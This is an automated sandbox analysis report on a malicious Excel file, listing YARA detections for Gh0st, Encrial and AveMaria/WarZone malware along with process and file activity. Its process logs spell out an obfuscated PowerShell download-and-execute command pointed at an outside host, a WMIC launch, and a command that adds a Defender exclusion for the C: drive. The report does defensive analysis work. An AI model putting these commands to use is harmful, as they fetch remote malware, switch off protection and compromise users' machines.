Source: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: C:\Users\user\Desktop\DCC40000, type: DROPPED	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: C:\Users\user\AppData\Local\Temp\Test1.txt, type: DROPPED	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: C:\Users\user\AppData\Local\Temp\Test1.txt, type: DROPPED	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg, type: DROPPED	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg, type: DROPPED	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.0.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.0.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.0.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 19.0.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda

Source: Test3.jpg.15.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winXLS@25/31@1/2

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg

File created: C:\Program Files\Microsoft DN1

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5468:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_01

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{BC933150-BEEB-49D8-8D1E-23D6DFF39532} - OProcSessId.dat

Jump to behavior

Source: Telex06012020.xls

OLE indicator, Workbook stream: true

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: Telex06012020.xls

Virustotal: Detection: 12%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES578D.tmp' 'c:\Users\user\AppData\Local\Temp\mvqape5o\CSCDBDF9420C89B4C89B070DDF57D28F899.TMP'
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c COpY /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c Wmic PROcEss CALl creaTe %TEMP%\Test3.jpg
Source: unknown	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe Wmic PROcEss CALl creaTe C:\Users\user\AppData\Local\Temp\Test3.jpg
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\cmd.exe CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline'	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c COpY /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c Wmic PROcEss CALl creaTe %TEMP%\Test3.jpg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES578D.tmp' 'c:\Users\user\AppData\Local\Temp\mvqape5o\CSCDBDF9420C89B4C89B070DDF57D28F899.TMP'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe Wmic PROcEss CALl creaTe C:\Users\user\AppData\Local\Temp\Test3.jpg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe	Jump to behavior

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg

File written: C:\Program Files\Microsoft DN1\rdpwrap.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Directory created: C:\Program Files\Microsoft DN1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Directory created: C:\Program Files\Microsoft DN1\sqlmap.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Directory created: C:\Program Files\Microsoft DN1\rdpwrap.ini	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000000A.00000002.752607255.0000000001210000.00000002.00000001.sdmp
Source:	Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp
Source:	Binary string: RfxVmt.pdb source: Test3.jpg, 00000013.00000003.817118818.0000000004081000.00000004.00000001.sdmp
Source:	Binary string: RfxVmt.pdbGCTL source: Test3.jpg, 00000013.00000003.817118818.0000000004081000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: Test3.jpg, 00000013.00000002.946620033.0000000003979000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdbUGP source: Test3.jpg, 00000013.00000002.946620033.0000000003979000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg

Unpacked PE file: 19.2.Test3.jpg.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;.bss:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg

Unpacked PE file: 19.2.Test3.jpg.400000.0.unpack

PowerShell case anomaly found

Show sources

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\cmd.exe CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))	Jump to behavior

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline'			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Code function: 18_2_0042CE66 push dword ptr [ecx+esi*2+0Ch]; ret	18_2_0042CE77
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Code function: 18_2_0042C489 push edx; ret	18_2_0042C48B
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	Code function: 18_2_00402F43 pushfd ; iretd	18_2_00402F49
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_035222DC push 8BFFFFFFh; iretd	21_2_035222E6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_03522830 pushfd ; ret	21_2_03522831

Source: initial sample

Static PE information: section name: .text entropy: 7.60065118993

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\Test3.jpg	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg	File created: C:\Program Files\Microsoft DN1\sqlmap.dll	Jump to dropped file
